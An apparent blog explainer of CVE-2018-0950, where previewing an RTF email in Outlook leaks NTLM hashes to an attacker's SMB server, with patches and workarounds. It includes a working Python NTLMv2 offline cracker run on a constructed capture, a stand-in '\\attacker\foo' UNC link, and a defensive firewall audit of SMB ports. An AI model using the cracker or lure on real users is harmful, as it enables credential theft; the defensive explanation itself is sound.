Reading an email in Microsoft Outlook is causing your sensitive information to leak

A vulnerability (CVE-2018-0950) discovered by Will Dormann, a vulnerability analyst at the CERT Coordination Center (CERT/CC), could allow an attacker to steal sensitive information, including the victim’s Windows login credentials, merely by convincing the victim to preview an email in Microsoft Outlook; no further user interaction is required. [1]

How did it happen?

When a Rich Text Format (RTF) email is previewed in Microsoft Outlook, remotely hosted OLE content is retrieved without any additional user interaction. This can leak private information, including the user’s password hash, which an attacker may then crack offline. [2]

The case of Microsoft Outlook

Microsoft Outlook automatically retrieves remote OLE content when an RTF email is previewed. When that OLE content is hosted on an SMB/CIFS server, the Windows client attempts to authenticate to the server using single sign-on (SSO), which leaks the user’s IP address, domain name, username, hostname, and an NTLM password hash. If the user’s password is weak, an attacker can crack it in a short amount of time. [2]

Basics of OLE

OLE (Object Linking and Embedding) is a Microsoft technology, released in 1990, that allows content from one program to be embedded in a document handled by another program. For instance, in Windows 3.x Microsoft Write could embed a “Paintbrush Picture”, a “Sound”, or a “Package”, the three OLE object types that could be inserted into a Write document. [3]

Picture 1. Once inserted, the Write document contains embedded Paintbrush content (Source: Dormann, 2018)

Picture 2. Write document (Source: Dormann, 2018)

Microsoft Outlook is the email client that ships with Microsoft Office. Outlook can send rich text (RTF) email messages, and those messages can contain OLE objects. [3]

Picture 3. RTF (Source: Dormann, 2018)

Microsoft Outlook vulnerability

A remote, unauthenticated attacker can obtain the victim’s IP address, domain name, username, hostname, and password hash merely by convincing the user to preview an RTF email message in Microsoft Outlook. The password hash can be cracked offline. This vulnerability may be combined with other weaknesses to change its impact. [2]

To exploit it, the attacker sends the target an RTF email containing an OLE object (for example an image) that is hosted on an SMB server the attacker controls. Because Outlook renders OLE content automatically, the Windows client initiates NTLM authentication to the attacker’s server over SMB using single sign-on (SSO), handing over the victim’s username and the NTLMv2 challenge/response derived from the user’s password hash. Cracking that response offline recovers the password, which may in turn give the attacker access to the victim’s system. [1]

Picture 4. IP address, domain name, username, hostname and SMB session key are leaked (Source: Dormann, 2018)

An SMB connection is negotiated automatically simply because Outlook previews the email. In Picture 4 the IP address, domain name, username, hostname, and SMB session key are leaked. As Dormann puts it: “A remote OLE object in a rich text email message functions like a web bug on steroids!” [3]

Why would any Windows PC automatically hand over credentials to the cybercriminal’s SMB server?

Picture 5. SMB authentication mechanism (Source: thehackernews, 2018)

Picture 5 shows how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response mechanism: the server issues a challenge, and the client answers with a response computed from the user’s NT password hash. Because of SSO, the Windows client does this without prompting the user, regardless of who operates the server.
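
To make concrete why the material leaked in Picture 4 is worth stealing even though it is not the password itself, here is an added example, written for this page and not taken from the CERT note or Dormann’s post. It implements the NTLMv2 computation from MS-NLMP, constructs a stand-in for what the attacker’s SMB server would record (a fixed challenge, a hypothetical user jdoe in domain CORP, and a password chosen here), and then recovers the password offline by recomputing the response for each candidate in a small wordlist. The MD4 routine is included because hashlib’s md4 is frequently unavailable on modern OpenSSL builds.

```python
"""Offline recovery of a weak password from a leaked NTLMv2 SMB authentication.

Added example, not code from the CERT note or Dormann's post. The "capture" is
constructed here from a known password to stand in for what an attacker's SMB
server records; no real credential is involved.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 is often disabled on OpenSSL 3."""
    def rotl(x, s):
        x &= MASK
        return ((x << s) | (x >> (32 - s))) & MASK

    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1: F(x,y,z) = (x & y) | (~x & z), words in order
            a = rotl(a + ((b & c) | (~b & d)) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G = majority, words taken column-wise
            k = (i % 4) * 4 + i // 4
            a = rotl(a + ((b & c) | (b & d) | (c & d)) + X[k] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H = xor, words in bit-reversed order
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl(a + (b ^ c ^ d) + X[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """The NT hash: MD4 of the UTF-16LE password. Unsalted, so one wordlist serves every user."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed by NTOWFv2 over ServerChallenge || blob.
    NTOWFv2 = HMAC-MD5(NT hash, UPPERCASE(user) || domain) in UTF-16LE."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def build_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure the client sends in clear alongside NTProofStr."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def simulate_leak(user: str, domain: str, password: str) -> str:
    """Constructed stand-in for an attacker's SMB server log, in hashcat -m 5600 layout.
    Everything here is visible to that server: it chose the challenge, the client sent the rest."""
    server_challenge = bytes.fromhex("1122334455667788")   # fixed for reproducibility
    client_challenge = bytes.fromhex("aabbccddeeff0011")   # normally random per logon
    target_info = struct.pack("<HH", 2, 16) + "ATTACKER".encode("utf-16-le") + struct.pack("<HH", 0, 0)
    blob = build_blob(131679000000000000, client_challenge, target_info)
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(capture_line: str, wordlist) -> "str | None":
    """Offline dictionary attack: recompute NTProofStr per candidate; no traffic to the victim."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture_line.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed victim and wordlist (hypothetical names and password, not from the page).
CAPTURE = simulate_leak("jdoe", "CORP", "Summer2018")
WORDLIST = ["password", "Welcome1", "Summer2018", "P@ssw0rd"]

if __name__ == "__main__":
    print("leaked:", CAPTURE)
    print("recovered:", crack(CAPTURE, WORDLIST))
```

Everything the attack needs is in the server’s own log: it chose the 8-byte challenge, and the client’s authenticate message carries the username, domain and blob in clear, so the only secret is the unsalted NT hash. That is why the workarounds below insist on long, random passwords: each guess costs two HMAC-MD5 operations, with no network round trip and no lockout.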

Microsoft Outlook Behavior

HTML email is far more common on the Internet than rich text email, so first consider how Microsoft Outlook behaves when viewing an HTML message that references a remote image on a web server. [3]

Picture 6. The remote image is not loaded automatically (Source: Dormann, 2018)

The remote image is not loaded automatically. If Outlook loaded remote images automatically, the message could leak the client system’s IP address and other metadata such as the time the email was viewed; this restriction protects against web bugs in email messages. Now consider the same sort of message in rich text format, where instead of a remote image file the reference is an OLE object loaded from a remote SMB server: [3]

Picture 7. RTF message (Source: Dormann, 2018)

Outlook blocks remote web content because of the privacy risk of web bugs; with a rich text email, however, the remote OLE object is loaded with no user interaction at all.

Solutions [2]

Apply the update

This vulnerability is addressed in the Microsoft update for CVE-2018-0950. This update prevents Outlook from automatically initiating SMB connections when an RTF email is previewed. Note that other techniques requiring additional user interaction will still function after this patch is installed. For example, if an email contains a UNC link, like \\attacker\foo, Outlook will automatically make this link clickable. If a user clicks such a link, the impact will be the same as with this vulnerability. For this reason, please also consider the following workarounds.

Block inbound and outbound SMB connections at your network border

This can be accomplished by blocking ports 445/tcp, 137/tcp, 139/tcp, as well as 137/udp and 139/udp.
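
As an added check for this workaround (not part of the CERT note), the following Python audit walks connection records from a border firewall export and lists SMB/NetBIOS traffic whose destination lies outside the internal address space. The record layout, the internal networks and the sample lines are constructed for the illustration, and the TEST-NET addresses stand in for Internet hosts. A hit marked ALLOW means the border block is not in place; a hit marked DENY is still useful, because it identifies a client that just tried to authenticate to an external SMB server, which is exactly what a previewed RTF email would trigger.

```python
"""Audit border-firewall connection records for SMB/NetBIOS leaving the internal network.

Added example, not from the CERT note. Record layout, internal ranges and sample
lines are constructed here; adapt parse() to your own firewall's export format.
"""
import ipaddress

# Ports named in the CERT workaround: block in both directions at the border.
SMB_PORTS = {("tcp", 445), ("tcp", 137), ("tcp", 139), ("udp", 137), ("udp", 139)}

# Assumption: the organisation's internal address space is the RFC 1918 ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(ip: str) -> bool:
    """True when the address is outside every configured internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def parse(line: str) -> dict:
    """Constructed layout: '<ts> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <ALLOW|DENY>'."""
    ts, proto, src, _arrow, dst, action = line.split()
    src_ip, _src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": ts, "proto": proto.lower(), "src": src_ip, "dst": dst_ip,
            "dst_port": int(dst_port), "action": action.upper()}


def audit(lines) -> list:
    """Return every SMB/NetBIOS record whose destination lies outside the internal ranges,
    whether the firewall allowed it (block missing) or denied it (attempt worth investigating)."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse(line)
        if (rec["proto"], rec["dst_port"]) in SMB_PORTS and is_external(rec["dst"]):
            findings.append(rec)
    return findings


# Constructed sample export; 203.0.113.0/24 and 198.51.100.0/24 stand in for Internet hosts.
SAMPLE_LOG = """
2018-04-12T09:15:02Z tcp 10.0.0.5:50123 -> 203.0.113.10:445 ALLOW
2018-04-12T09:15:02Z tcp 10.0.0.5:50124 -> 10.0.0.20:445 ALLOW
2018-04-12T09:15:03Z udp 10.0.0.5:137 -> 203.0.113.10:137 DENY
2018-04-12T09:16:10Z tcp 10.0.0.7:50200 -> 198.51.100.7:443 ALLOW
""".strip().splitlines()

if __name__ == "__main__":
    for rec in audit(SAMPLE_LOG):
        verdict = "border block MISSING" if rec["action"] == "ALLOW" else "blocked, but attempted"
        print(f'{rec["ts"]} {rec["src"]} -> {rec["dst"]}:{rec["dst_port"]}/{rec["proto"]}: {verdict}')
```

On the constructed sample the audit reports two records: the allowed connection to 203.0.113.10:445, which shows the border rule is missing, and the denied NetBIOS attempt from the same client, which is the host to examine for a malicious RTF email. The internal file-server connection and the HTTPS session are correctly ignored.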

Block NTLM Single Sign-on (SSO) authentication

Block NTLM Single Sign-on (SSO) authentication, as specified in Microsoft Security Advisory ADV170014. Starting with Windows 10 and Server 2016, if the EnterpriseAccountSSO registry value is created and set to 0, SSO authentication will be disabled for external and unspecified network resources. With this registry change, accessing SMB resources is still allowed, but external and unspecified SMB resources will require the user to enter credentials as opposed to automatically attempting to use the hash of the currently logged-on user.

Use strong passwords

Assume that at some point your client system will attempt to make an SMB connection to an attacker’s server. For this reason, make sure that any Windows login has a sufficiently complex password so that it is resistant to cracking. The following two strategies can help achieve this goal:

  • Use a password manager to help generate complex random passwords. This strategy can help ensure the use of unique passwords across resources that you use, and it can ensure that the passwords are of sufficient complexity and randomness.
  • Use longer passphrases (with mixed-case letters, numbers and symbols) instead of passwords. This strategy produces strong credentials that do not require additional software to store and retrieve.

References

[1] https://thehackernews.com/2018/04/outlook-smb-vulnerability.html

[2] https://www.kb.cert.org/vuls/id/974272

[3] https://insights.sei.cmu.edu/cert/2018/04/automatically-stealing-password-hashes-with-microsoft-outlook-and-ole.html

  1. Server Message Block (SMB):  The Server Message Block Protocol (SMB protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. It can also carry transaction protocols for interprocess communication. Created by IBM in the 1980s, the SMB protocol has since spawned multiple variants or implementations, also known as dialects, to meet evolving network requirements over the years. For more details visit https://searchnetworking.techtarget.com/definition/Server-Message-Block-Protocol
